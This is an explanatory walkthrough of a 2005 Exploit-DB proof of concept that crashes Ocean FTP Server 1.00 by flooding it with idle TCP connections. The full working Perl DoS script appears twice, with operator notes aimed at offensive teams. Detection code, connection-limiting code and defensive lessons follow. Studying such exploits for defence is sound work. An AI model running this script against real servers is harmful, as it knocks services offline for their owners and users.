Ocean FTP Server 1.00 Denial of Service Exploit Explained

What this paper is
This paper is a Proof-of-Concept (PoC) exploit for a Denial of Service (DoS) vulnerability in Ocean FTP Server version 1.00. It demonstrates how to crash the server by overwhelming it with too many simultaneous connections. The exploit is written in Perl.
Simple technical breakdown
The exploit works by opening a large number of TCP connections to the target FTP server. Each connection is established but not properly closed or utilized. The server, unable to handle this flood of open, idle connections, eventually runs out of resources and crashes. After the crash, the script waits for a specified duration before attempting to clean up any lingering connections (though at this point, the server is likely already down).
Complete code and payload walkthrough
The provided Perl script is a straightforward DoS tool. Let's break down its components:
#!/usr/bin/perl
###############################
# GSS-IT Research And Security Labs #
###############################
# #
# www.gssit.co.il #
# #
###############################
# Ocean FTP Server Ver 1.00 Denial Of Service POC #
###############################
# Use This PoC For Educational Purposes Only #
###############################
- Header Comments: These lines are comments providing attribution to the researchers (GSS-IT), the purpose of the script (DoS PoC for Ocean FTP Server v1.00), and a disclaimer about its educational use.
use Socket;
- use Socket;: This line imports the Socket module, which is essential for network programming in Perl. It provides functions for creating, connecting to, and managing network sockets.
if (($#ARGV) < 2)
{
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n\n");
print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
exit
}
- Argument Check:
  - ($#ARGV): $#ARGV is the index of the last element in the @ARGV array (which holds the command-line arguments), so it is one less than the number of arguments. If it is less than 2, fewer than three arguments were supplied, meaning the user hasn't provided all of the required Host, Port, and Sleep values.
  - The if block prints usage instructions and then exits the script if the correct number of arguments isn't given.
  - $0: This special Perl variable holds the name of the script itself.
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n");
- Header Output: This section prints a banner to the console, similar to the one in the argument check, confirming the script's identity.
$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');
- Variable Assignment:
  - $host = $ARGV[0];: Assigns the first command-line argument (the target host IP address or hostname) to the $host variable.
  - $port = $ARGV[1];: Assigns the second command-line argument (the target port, typically 21 for FTP) to the $port variable.
  - $slp = $ARGV[2];: Assigns the third command-line argument (the number of seconds to sleep after the DoS) to the $slp variable.
  - $proto = getprotobyname('tcp');: Retrieves the protocol number for TCP, which is needed for socket creation.
for ($i=1; $i<110; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $proto );
$dest = sockaddr_in ($port, inet_aton($host));
if (!(connect($i, $dest)))
{
Slp();
}
}
- Connection Loop:
  - for ($i=1; $i<110; $i++): This loop iterates 109 times (from $i = 1 to $i = 109).
  - socket($i, PF_INET, SOCK_STREAM, $proto );: In each iteration, a new TCP socket is created.
    - $i: The loop counter is used as the name of the socket's filehandle, so each connection gets its own handle, numbered from 1 to 109.
    - PF_INET: Specifies the address family as IPv4.
    - SOCK_STREAM: Specifies the socket type as a stream socket (for TCP).
    - $proto: The protocol number for TCP obtained earlier.
  - $dest = sockaddr_in ($port, inet_aton($host));: This prepares the destination address structure for the connect call.
    - inet_aton($host): Converts the human-readable IP address or hostname ($host) into a packed binary format suitable for network operations.
    - sockaddr_in(...): Creates a socket address structure using the port number and the packed IP address.
  - if (!(connect($i, $dest))): Attempts to establish a connection to the target host and port using the socket $i.
    - connect($i, $dest): This function attempts to connect the socket $i to the address specified by $dest.
    - !(...): If the connect call fails (returns false), the if block is executed.
  - Slp();: If a connection fails, the Slp subroutine is called. This is a crucial part of the exploit's logic. The intent here is that if the server is already struggling or down, connections might fail. The script interprets this as a sign that the DoS might be effective or that it should proceed to the cleanup phase.
print("==> Unsuccesful <==");
exit;
- Post-Loop Message: If the loop completes without any connect calls failing (meaning all 109 connections were successfully established), this message is printed, indicating the exploit was "unsuccessful" in its primary goal of crashing the server by failing to connect. The script then exits.
sub Slp
{
print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
print("The Server Will Be Down For $slp Seconds\n\n");
sleep ($slp);
print("==> Killing Connections ...<==\n");
for ($j=1; $j<110; $j++)
{
shutdown($j,2);
}
print ("[#] Back To Work Server Up [#] ");
exit;
}
- Slp Subroutine: This subroutine is executed when a connect call fails within the main loop.
  - print(...): Prints messages indicating the server has been "successfully DoS'ed" and for how long it's expected to be down.
  - sleep ($slp);: Pauses the script execution for the duration specified by the $slp command-line argument. This is intended to simulate the server being down.
  - print("==> Killing Connections ...<==\n");: Informs the user that the script is now attempting to clean up.
  - for ($j=1; $j<110; $j++) { shutdown($j,2); }: This loop attempts to close all the sockets that were opened.
    - shutdown($j, 2): This function is used to shut down a socket. The argument 2 typically means a full duplex shutdown (both sending and receiving are disabled). The intent is to release the resources held by these connections.
  - print ("[#] Back To Work Server Up [#] ");: Prints a message indicating the server is "back up" (which is ironic, as the script assumes it was down).
  - exit;: Terminates the script.
Mapping list:
- #!/usr/bin/perl: Interpreter directive.
- use Socket;: Imports network programming library.
- if (($#ARGV) < 2): Checks for sufficient command-line arguments.
- print("Use : ..."): Displays usage instructions.
- $host = $ARGV[0];: Stores target hostname/IP.
- $port = $ARGV[1];: Stores target port.
- $slp = $ARGV[2];: Stores sleep duration.
- $proto = getprotobyname('tcp');: Gets TCP protocol number.
- for ($i=1; $i<110; $i++): Loop to create multiple connections.
- socket($i, PF_INET, SOCK_STREAM, $proto );: Creates a TCP socket.
- $dest = sockaddr_in ($port, inet_aton($host));: Prepares destination address.
- connect($i, $dest): Attempts to connect the socket.
- if (!(connect(...))): Checks if connection failed.
- Slp();: Calls the cleanup/reporting subroutine on connection failure.
- print("==> Unsuccesful <==");: Output if all connections succeed.
- sub Slp { ... }: Defines the subroutine executed on connection failure.
- print("\n\nServer $host Has Been Successfully DoS'ed\n\n");: Reports successful DoS.
- sleep ($slp);: Pauses execution.
- for ($j=1; $j<110; $j++) { shutdown($j,2); }: Closes all opened sockets.
- print ("[#] Back To Work Server Up [#] ");: Reports server is back up.
- exit;: Terminates the script.
Practical details for offensive operations teams
- Required Access Level: Network access to the target host is required. No elevated privileges on the target system are needed, as this is a network-based DoS.
- Lab Preconditions:
  - A vulnerable Ocean FTP Server v1.00 instance must be running on the target.
  - The target host must be reachable from the attacker's machine over TCP.
  - Firewalls must not block the outbound connection attempts from the attacker's machine to the target's FTP port.
- Tooling Assumptions:
  - Perl interpreter must be installed on the attacker's machine.
  - Basic network connectivity tools (like ping, nmap to verify service) are assumed for reconnaissance.
- Execution Pitfalls:
  - False Positives: The script's logic for determining a "successful DoS" is based on connection failures. If the server is already overloaded or down, connections will fail, triggering the Slp() subroutine. This might lead to a false report of a successful DoS when the server was already unavailable.
  - Connection Limit: The loop runs 109 times. This number might be too low to overwhelm a robust server or a server with a high connection limit. The server's ability to handle concurrent connections is the primary factor.
  - Network Latency/Packet Loss: High latency or packet loss can cause connect() calls to time out, which the script interprets as a failure. This could lead to the Slp() subroutine being called even if the server is healthy but slow to respond.
  - Resource Exhaustion: The exploit relies on the server exhausting its available resources (e.g., memory, file descriptors, process slots) for handling new connections. If the server has ample resources or is configured to limit new connections, this exploit may not be effective.
  - IP Spoofing: This script does not implement IP spoofing. The source IP will be the attacker's actual IP, making it traceable.
  - Payload Execution: This is a DoS exploit; it does not provide remote code execution or shell access. The goal is solely to disrupt service.
- Telemetry:
  - Outbound TCP SYN packets: A burst of SYN packets to the target FTP port (e.g., 21) from the attacker's IP.
  - Outbound TCP connection attempts: Numerous connect() calls being made.
  - Server-side logs: The target server might log incoming connection attempts. If the server crashes, it might generate crash dumps or system error logs.
  - Network monitoring: Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS) might detect a large number of connection attempts to a single host/port as a potential DoS attack.
  - Application logs: The Ocean FTP Server itself might log connection attempts or errors related to resource exhaustion before crashing.
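The telemetry above can be turned into a detection rule: flag any source that holds many connections open at once without sending data. The following is an added example, not part of the original paper or PoC; the event format, the function names and the threshold of 50 are assumptions, and the sample events are constructed.

```python
from collections import defaultdict

# Constructed sample events (not real logs), one per line:
#   "<epoch_seconds> <OPEN|DATA|CLOSE> <src_ip>:<src_port> <dst_port>"
def make_sample_events():
    events = []
    # One source opens 109 control connections to port 21 and never sends a byte.
    for n in range(109):
        events.append(f"{1000 + n * 0.01:.2f} OPEN 198.51.100.7:{40000 + n} 21")
    # An ordinary client: connects, talks, disconnects.
    events += [
        "1000.50 OPEN 192.0.2.10:51000 21",
        "1000.60 DATA 192.0.2.10:51000 21",
        "1003.00 CLOSE 192.0.2.10:51000 21",
    ]
    return sorted(events, key=lambda line: float(line.split()[0]))


def find_idle_connection_floods(lines, threshold=50):
    """Return {src_ip: peak number of simultaneously open, silent connections}
    for every source whose peak reaches the threshold (hypothetical value)."""
    silent = defaultdict(set)   # src_ip -> connections open with no data seen yet
    peaks = defaultdict(int)
    for line in lines:
        _ts, event, src, dport = line.split()
        ip, sport = src.rsplit(":", 1)
        conn = (sport, dport)
        if event == "OPEN":
            silent[ip].add(conn)
        elif event in ("DATA", "CLOSE"):
            silent[ip].discard(conn)   # no longer silent, or no longer open
        peaks[ip] = max(peaks[ip], len(silent[ip]))
    return {ip: peak for ip, peak in peaks.items() if peak >= threshold}


if __name__ == "__main__":
    for ip, peak in find_idle_connection_floods(make_sample_events()).items():
        print(f"ALERT {ip}: {peak} concurrent connections with no data")
```

Counting only connections that have carried no data keeps busy but legitimate clients from tripping the rule.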
Where this was used and when
- Context: This exploit targets a specific vulnerability in Ocean FTP Server version 1.00. Such vulnerabilities are typically discovered during security audits, penetration tests, or by security researchers.
- Timeframe: The exploit was published on March 21, 2005. This indicates the vulnerability existed and was exploitable around or before this date. It's highly likely that Ocean FTP Server v1.00 was in use during the early to mid-2000s.
- Usage: It would have been used by security professionals for authorized penetration testing to demonstrate the impact of such a vulnerability. It could also have been used by malicious actors if they had access to the software and were looking to disrupt services.
Defensive lessons for modern teams
- Keep Software Updated: The most fundamental defense is to ensure all software, especially network-facing services like FTP servers, is kept up-to-date with the latest security patches. This vulnerability is specific to version 1.00, implying later versions likely fixed it.
- Resource Limiting: Implement server-side configurations to limit the number of concurrent connections per client or overall. This can prevent a single client from exhausting server resources.
- Network Segmentation and Firewalls: Isolate FTP servers on a separate network segment. Use firewalls to restrict access to the FTP port (21) only from trusted IP addresses or networks.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect patterns of suspicious network activity, such as a sudden surge of connection attempts to a single service, which is characteristic of DoS attacks.
- Regular Audits and Vulnerability Scanning: Proactively scan your environment for known vulnerabilities and outdated software.
- Logging and Monitoring: Ensure comprehensive logging is enabled on servers and network devices. Monitor logs for unusual activity, connection errors, or resource exhaustion warnings.
- Consider Alternatives: For modern environments, consider more secure and robust file transfer protocols like SFTP (SSH File Transfer Protocol) or FTPS (FTP over SSL/TLS) instead of plain FTP, which lacks encryption and has known security weaknesses.
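The resource-limiting lesson above, sketched as admission-control logic for a server's accept loop. This is an added example, not code from Ocean FTP Server or the original paper; the class name, the limits (5 per address, 100 total, 30 seconds idle) and the scenario in simulate() are assumptions chosen for illustration.

```python
class ConnectionLimiter:
    """Admission control for an accept loop: per-IP cap, global cap, idle reaping."""

    def __init__(self, per_ip_max=5, total_max=100, idle_timeout=30.0):
        self.per_ip_max = per_ip_max
        self.total_max = total_max
        self.idle_timeout = idle_timeout
        self.conns = {}  # conn_id -> [src_ip, last_activity_time]

    def admit(self, conn_id, ip, now):
        """Return True if the new connection may be served, False to refuse it."""
        from_ip = sum(1 for src, _last in self.conns.values() if src == ip)
        if len(self.conns) >= self.total_max or from_ip >= self.per_ip_max:
            return False
        self.conns[conn_id] = [ip, now]
        return True

    def touch(self, conn_id, now):
        """Record activity (a command or data) on an admitted connection."""
        if conn_id in self.conns:
            self.conns[conn_id][1] = now

    def release(self, conn_id):
        """Forget a connection the peer or the server has closed."""
        self.conns.pop(conn_id, None)

    def reap_idle(self, now):
        """Forget connections silent for longer than idle_timeout and return
        their ids so the caller can close the underlying sockets."""
        stale = [cid for cid, (_ip, last) in self.conns.items()
                 if now - last > self.idle_timeout]
        for cid in stale:
            del self.conns[cid]
        return stale


def simulate():
    """Constructed scenario: 109 silent connections from one address, one real client."""
    lim = ConnectionLimiter()
    flood_admitted = sum(lim.admit(("flood", n), "198.51.100.7", n * 0.01)
                         for n in range(109))
    client_admitted = lim.admit("client", "192.0.2.10", 2.0)
    lim.touch("client", 25.0)          # the real client keeps issuing commands
    reaped = lim.reap_idle(31.0)       # periodic sweep by the server
    return flood_admitted, client_admitted, len(reaped), list(lim.conns)
```

In the constructed scenario only 5 of the 109 silent connections are admitted, the other client is still served, and the sweep at 31 seconds frees the 5 idle slots.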
ASCII visual
This exploit is a direct network interaction. A simple flow diagram can illustrate the process:
+-----------------+ +-----------------+ +-----------------+
| Attacker Machine| ----> | Target FTP Port | ----> | Ocean FTP Server|
| (Perl Script) | | (e.g., TCP 21) | | (v1.00) |
+-----------------+ +-----------------+ +-----------------+
|
| 109 x TCP Connections (SYN, SYN-ACK, ACK)
| (No data exchange, just connection establishment)
|
+------------------------------------------------> Server attempts to
handle each connection.
If it fails to connect
(e.g., server busy/down),
script reports DoS and exits.
If all connect, script reports failure.
Source references
- Paper ID: 893
- Paper Title: Ocean FTP Server 1.00 - Denial of Service
- Author: GSS IT
- Published: 2005-03-21
- Keywords: Windows, dos
- Paper URL: https://www.exploit-db.com/papers/893
- Raw Exploit URL: https://www.exploit-db.com/raw/893
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
###############################
# GSS-IT Research And Security Labs #
###############################
# #
# www.gssit.co.il #
# #
###############################
# Ocean FTP Server Ver 1.00 Denial Of Service POC #
###############################
# Use This PoC For Educational Purposes Only #
###############################
use Socket;
if (($#ARGV) < 2)
{
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n\n");
print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
exit
}
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n");
$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');
for ($i=1; $i<110; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $proto );
$dest = sockaddr_in ($port, inet_aton($host));
if (!(connect($i, $dest)))
{
Slp();
}
}
print("==> Unsuccesful <==");
exit;
sub Slp
{
print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
print("The Server Will Be Down For $slp Seconds\n\n");
sleep ($slp);
print("==> Killing Connections ...<==\n");
for ($j=1; $j<110; $j++)
{
shutdown($j,2);
}
print ("[#] Back To Work Server Up [#] ");
exit;
}
# milw0rm.com [2005-03-21]